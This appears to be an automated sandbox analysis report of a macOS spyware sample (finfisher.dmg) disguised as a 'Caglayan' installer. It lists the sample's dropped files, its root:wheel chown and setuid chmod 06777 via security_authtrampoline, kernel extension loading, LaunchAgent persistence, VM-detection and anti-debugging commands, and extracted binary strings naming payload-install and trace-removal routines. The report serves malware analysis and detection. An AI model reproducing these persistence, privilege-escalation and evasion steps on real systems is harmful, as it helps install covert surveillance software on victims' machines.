Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	64-bit Mach-O written to unusual path: /Users/ben/Library/Caches/org.logind.ctp.archive/helper	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	32-bit Mach-O written to unusual path: /Users/ben/Library/Caches/org.logind.ctp.archive/helper3	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	64-bit Mach-O written to unusual path: /Users/ben/Library/Caches/org.logind.ctp.archive/installer	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	64-bit Mach-O written to unusual path: /Users/ben/Library/Caches/org.logind.ctp.archive/logind	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	64-bit Mach-O written to unusual path: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/MacOS/logind	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	64-bit Mach-O written to unusual path: /Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/MacOS/logind	Jump to dropped file

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	Permissions modified for written 64-bit Mach-O /Users/ben/Library/Caches/org.logind.ctp.archive/helper: bits: - usr: rx grp: rx all: rwx				Jump to dropped file
Source: /bin/chmod (PID: 793)	Permissions modified for written 64-bit Mach-O /Users/ben/Library/Caches/org.logind.ctp.archive/installer: bits: ug usr: rwx grp: rwx all: rwx			Jump to behavior

Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	File moved: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext -> /System/Library/Extensions/logind.kext	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Owner / group modified: /System/Library/Extensions/logind.kext	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Owner / group modified: /System/Library/Extensions/logind.kext/Contents	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Owner / group modified: /System/Library/Extensions/logind.kext/Contents/MacOS	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Owner / group modified: /System/Library/Extensions/logind.kext/Contents/MacOS/logind	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Owner / group modified: /System/Library/Extensions/logind.kext/Contents/Resources	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Owner / group modified: /System/Library/Extensions/logind.kext/Contents/Resources/en.lproj	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Owner / group modified: /System/Library/Extensions/logind.kext/Contents/Resources/en.lproj/InfoPlist.strings	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Owner / group modified: /System/Library/Extensions/logind.kext/Contents/Info.plist	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Permissions modified: /System/Library/Extensions/logind.kext	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Permissions modified: /System/Library/Extensions/logind.kext/Contents	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Permissions modified: /System/Library/Extensions/logind.kext/Contents/MacOS	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Permissions modified: /System/Library/Extensions/logind.kext/Contents/MacOS/logind	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Permissions modified: /System/Library/Extensions/logind.kext/Contents/Resources	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Permissions modified: /System/Library/Extensions/logind.kext/Contents/Resources/en.lproj	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Permissions modified: /System/Library/Extensions/logind.kext/Contents/Resources/en.lproj/InfoPlist.strings	Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)	Permissions modified: /System/Library/Extensions/logind.kext/Contents/Info.plist	Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)

Bundle Info.plist File created: /Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/7f.bundle/Contents/Info.plist

Jump to behavior

Source: /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper (PID: 797)	Hidden File created: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/.autodiskmounted			Jump to behavior
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	Hidden File created: /Users/ben/Library/Caches/.dat.nosync0309.NWxLXe			Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	Shell command executed: /bin/sh -c system_profiler SPUSBDataType \| egrep -i 'Manufacturer: (parallels\|vmware\|virtualbox)'	Jump to behavior
Source: /private/etc/logind (PID: 801)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 827)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 835)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 842)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 849)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 856)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 863)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 870)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 878)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 885)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 892)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 899)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 906)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 913)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 920)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior
Source: /private/etc/logind (PID: 927)	Shell command executed: /bin/sh -c ps -ef \| grep 'logind'	Jump to behavior

Source: /usr/libexec/security_authtrampoline (PID: 793)

Chmod executable: /bin/chmod -> /bin/chmod 06777 /Users/ben/Library/Caches/org.logind.ctp.archive/installer

Jump to behavior

Source: /usr/libexec/security_authtrampoline (PID: 792)

Chown executable: /usr/sbin/chown -> /usr/sbin/chown root:wheel /Users/ben/Library/Caches/org.logind.ctp.archive/installer

Jump to behavior

Source: /bin/sh (PID: 804)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 830)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 838)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 845)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 852)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 859)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 866)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 873)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 881)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 888)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 895)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 902)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 909)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 916)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 923)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior
Source: /bin/sh (PID: 930)	Grep executable: /usr/bin/grep -> grep logind	Jump to behavior

Source: /bin/sh (PID: 803)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 829)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 837)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 844)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 851)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 858)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 865)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 872)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 880)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 887)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 894)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 901)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 908)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 915)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 922)	Ps executable: /bin/ps -> ps -ef	Jump to behavior
Source: /bin/sh (PID: 929)	Ps executable: /bin/ps -> ps -ef	Jump to behavior

Source: /bin/bash (PID: 786)	Rm executable: /bin/rm -> rm Install alayan			Jump to behavior
Source: /bin/bash (PID: 788)	Rm executable: /bin/rm -> rm -rf .log			Jump to behavior

Source: /Users/ben/Library/Caches/org.logind.ctp.archive/helper (PID: 792)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /usr/sbin/chown auth 3 root:wheel /Users/ben/Library/Caches/org.logind.ctp.archive/installer			Jump to behavior
Source: /Users/ben/Library/Caches/org.logind.ctp.archive/helper (PID: 793)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /bin/chmod auth 3 06777 /Users/ben/Library/Caches/org.logind.ctp.archive/installer			Jump to behavior

Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)

Launch agent/daemon loaded: /bin/launchctl load /Library/LaunchAgents/logind.plist

Jump to behavior

Source: /bin/sh (PID: 779)	Shell process: system_profiler SPUSBDataType	Jump to behavior
Source: /bin/sh (PID: 780)	Shell process: egrep -i Manufacturer: (parallels\|vmware\|virtualbox)	Jump to behavior
Source: /bin/sh (PID: 803)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 804)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 829)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 830)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 837)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 838)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 844)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 845)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 851)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 852)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 858)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 859)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 865)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 866)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 872)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 873)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 880)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 881)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 887)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 888)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 894)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 895)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 901)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 902)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 908)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 909)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 915)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 916)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 922)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 923)	Shell process: grep logind	Jump to behavior
Source: /bin/sh (PID: 929)	Shell process: ps -ef	Jump to behavior
Source: /bin/sh (PID: 930)	Shell process: grep logind	Jump to behavior

Source: /bin/bash (PID: 776)

Application opened: open .log/ARA0848.app

Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	Preferences launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Preferences launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	Preferences launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer (PID: 816)	CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist	Jump to behavior

Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer (PID: 816)	Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plist			Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plist			Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)

File written: /Users/ben/Library/Caches/org.logind.ctp.archive/helper3

Jump to dropped file

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	File written: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/installer	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	File written: /Users/ben/Library/Caches/org.logind.ctp.archive/helper	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	File written: /Users/ben/Library/Caches/org.logind.ctp.archive/installer	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	File written: /Users/ben/Library/Caches/org.logind.ctp.archive/logind	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	File written: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/MacOS/logind	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	File written: /Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/MacOS/logind	Jump to dropped file

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)

ZIP file created: /Users/ben/Library/Caches/.dat.nosync0309.NWxLXe

Jump to dropped file

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	CRL file created: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/prodSvce.crl			Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	CRL file created: /private/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/cds.crl			Jump to dropped file

Source: extracted file from GPT submission

CodeResources XML file: caglayan-macos/Install Caglayan.app/Contents/_CodeSignature/CodeResources

Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer (PID: 816)	Random device file read: /dev/random			Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Random device file read: /dev/random			Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer (PID: 816)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	XML plist file created: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.plist	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	XML plist file created: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/Info.plist	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	XML plist file created: /Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Info.plist	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	XML plist file created: /Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/logind.plist	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	XML plist file created: /Users/ben/Library/Caches/org.logind.ctp.archive/storage.framework/Contents/Resources/7f.bundle/Contents/Info.plist	Jump to dropped file

Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)

Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.plist -> /Library/LaunchAgents/logind.plist

Jump to behavior

Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer (PID: 798)

Launch agent created File moved: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.plist -> /Library/LaunchAgents/logind.plist

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

App bundle contains hidden files/directories

Show sources

Source: archive file from GPT submission	Hidden directory : caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Resources/English.lproj/InfoPlist.strings
Source: archive file from GPT submission	Hidden directory : caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Info.plist
Source: archive file from GPT submission	Hidden directory : caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Resources/data
Source: archive file from GPT submission	Hidden directory : caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Resources/res
Source: archive file from GPT submission	Hidden directory : caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/PkgInfo
Source: archive file from GPT submission	Hidden directory : caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
Source: archive file from GPT submission	Hidden directory : caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Resources/English.lproj/MainMenu.nib

Creates kernel extensions

Show sources

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)

Kext Info.plist File created: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/Info.plist

Jump to behavior

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)

Show sources

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)

PTRACE system call (PT_DENY_ATTACH): PID 777 denies future traces

Jump to behavior

Source: /private/etc/logind (PID: 801)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 827)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 835)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 842)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 849)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 856)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 863)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 870)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 878)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 885)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 892)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 899)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 906)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 913)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior
Source: /private/etc/logind (PID: 920)	Kext via kextload loaded: /sbin/kextload /System/Library/Extensions/logind.kext	Jump to behavior

Malware Analysis System Evasion:

Queries the Manufacturer of the machine (might be used for detecting VM presence)

Show sources

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	Manufacturer keyword found in command: /bin/sh /bin/sh -c system_profiler SPUSBDataType \| egrep -i 'Manufacturer: (parallels\|vmware\|virtualbox)'			Jump to behavior
Source: /bin/sh (PID: 780)	Manufacturer keyword found in command: /usr/bin/egrep egrep -i Manufacturer: (parallels\|vmware\|virtualbox)			Jump to behavior

Source: /bin/bash (PID: 782)

Sleep executable: /bin/sleep -> sleep 2

Jump to behavior

Source: finfisher.dmg	Binary or memory string: system_profiler SPUSBDataType \| egrep -i "Manufacturer: (parallels\|vmware\|virtualbox)"
Source: AIRInstaller.dmg.322.dr	Binary or memory string: pQEMu<
Source: finfisher.dmg	Binary or memory string: vmware
Source: finfisher.dmg	Binary or memory string: MDMyMDEyNDgxMVowIQIQHGFsBuOe7gYOHWuGm9a85xcNMTYwOTE5MTMxODIxWjAhAhAcaqxJ4H3B
Source: finfisher.dmg	Binary or memory string: ptracereshw.modelvmwarevirtualboxparallelssystem_profiler SPUSBDataType \| egrep -i "Manufacturer: (parallels\|vmware\|virtualbox)"/bin/sh-c%@NSString/usr/bin/pythonhelper2kern.osrelease.system.privilege.admin/usr/sbin/chownroot:wheel/bin/chmod06777/sbin/mount_nfs/System/Library/CoreServices/Finder.app/bin/launchctlloadunload/sbin/kextunloadhelperinstallerlogind%2x/tmpdata80.bundle.ziparch.ziporg.logind.ctp.archive80.bundlelogind.kext/System/Library/ExtensionsStorage.framework/Library/Frameworkslogind.plist/Library/LaunchAgents/private/etcContents/Resources/7f.bundle/Contents/Resourcesrbr+bwb1.2.5-FailedError occursError occurs while getting file info/\\/Failed to reading zip filedelegateT@,&,N,V_delegate_objc_autoreleasePoolPush_objc_autoreleasePoolPop__TEXT__LINKEDIT_object_setInstanceVariable_object_setIvar_object_copy_objc_retain_objc_retainBlock_objc_release_objc_autorelease_objc_retainAutorelease_objc_autoreleaseReturnValue_objc_retainAutoreleaseReturnValue_objc_retainAutoreleasedReturnValue_objc_storeStrongdefaultManagermainBundleresourcePathstringByAppendingPathComponent:fileExistsAtPath:stringWithCString:encoding:rangeOfString:options:allocinitsetLaunchPath:stringWithFormat:arrayWithObjects:setArguments:pipesetStandardOutput:fileHandleForReadinglaunchwaitUntilExitterminationStatusreadDataToEndOfFilelengthremoveOldResourceexpandPayloadexecuteTrampolineinstallPayloadinstalleraskUserPermission:removeTracescompressedPayloadremove:expandedPayloadpayloaddataUsingEncoding:dataWithContentsOfFile:bytesdataWithBytes:length:writeToFile:atomically:systemTempunzip:to:isAfterPatchlaunchNewStylelaunchOldStylefileExistsAtPath:isDirectory:numberWithUnsignedLong:dictionaryWithObjectsAndKeys:trampolinesetA